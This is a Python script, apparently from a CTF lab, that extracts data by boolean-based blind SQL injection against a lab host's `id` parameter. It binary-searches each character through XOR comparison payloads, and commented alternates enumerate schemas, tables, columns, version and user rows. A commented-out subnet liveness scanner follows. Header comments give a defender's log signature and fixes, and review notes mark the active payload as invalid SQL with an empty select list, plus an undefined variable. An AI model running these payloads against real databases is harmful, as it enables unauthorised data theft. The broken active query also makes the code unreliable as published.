import requests
import time

# Boolean-based blind SQL injection extractor written for a CTF lab target.
#
# Mechanism, as the code below shows: each request appends an expression of
# the form `2^(ascii(substr(<query>,i,1))>mid)` to the `id` parameter. XOR
# with a 0/1 comparison result changes which id the application looks up, and
# the script treats the presence of a known e-mail address in the response
# as "comparison was true". A binary search over codes 32..128 then recovers
# one character in six or seven requests.
#
# Defender's view: in access logs this appears as a steady stream of GETs to
# one parameter containing `ascii(substr(` with an incrementing position and
# a changing numeric threshold. The root cause is the id value reaching the
# SQL statement unparameterised; binding it as an integer parameter removes
# the oracle. An application account without SELECT on the `mysql` and `sys`
# schemas also limits what the alternate queries kept below could read.
url = "http://172.19.14.20:27066/?id="
name = ''

for i in range(1, 1000):
    # Search window for the character at position i.
    low, high = 32, 128
    while low < high:
        mid = (low + high) // 2
        # Alternate queries the author kept for reference (labels translated
        # from the original; a few labels did not match their query).
        # -- current database name:
        # payload = f"2^(ascii(substr(database(),{i},1))>{mid})#"
        # -- table names in schema "ctf":
        # payload=f'2^(ascii(substr((select(table_name)from(sys.schema_table_statistics_with_buffer)where(table_schema)="ctf" limit 0,1),{i},1))>{mid})#'
        # -- column names of table "img_path":
        # payload=f'1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)="img_path"),{i},1))>{mid})#'
        # -- table_name from mysql.innodb_table_stats (originally labelled "data"):
        # payload=f"2^(ascii(substr((select(table_name)from(mysql.innodb_table_stats)),{i},1))>{mid})#"
        # -- row data; NOTE(review): `a` is not defined anywhere in this script:
        # payload = f"2^(ascii(substr((select(id)from(users)limit {a},1),{i},1))>{mid})#"
        # -- all schema names:
        # payload=f'1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),{i},1))>{mid})#'
        # -- version() (originally labelled "user privileges"):
        # payload = f"2^(ascii(substr(version(),{i},1))>{mid})#"
        #
        # Active query: one row from mysql.innodb_table_stats (limit 1,1).
        # NOTE(review): the select list is empty as published, so this is not
        # valid SQL as written; the original label ("database name") also
        # does not match the table being read.
        payload = f"2^(ascii(substr((select  from mysql.innodb_table_stats limit 1,1),{i},1))>{mid})#"
        # Pause between requests; the author added this because sending them
        # too quickly made the extraction produce errors.
        time.sleep(0.1)
        resp = requests.get(url + payload)
        if 'geshuai@huse.com' not in resp.text:
            # Marker absent: the character code is not above mid.
            high = mid
        else:
            # Marker present: the character code is above mid.
            low = mid + 1
    if low == 32:
        # Window never moved off its floor, so no character was found at
        # this position; stop.
        break
    name += chr(low)
    print(name)
# import requests
#
# for i in range(1,255):
#     url="http://192-168-1-"+str(i)+".pvp3558.bugku.cn"
#     # print(url)
#     try:
#         r=requests.get(url=url)
#         if r.status_code==200:
#             print("检测到存活ip："+url)
#     except:
#         pass
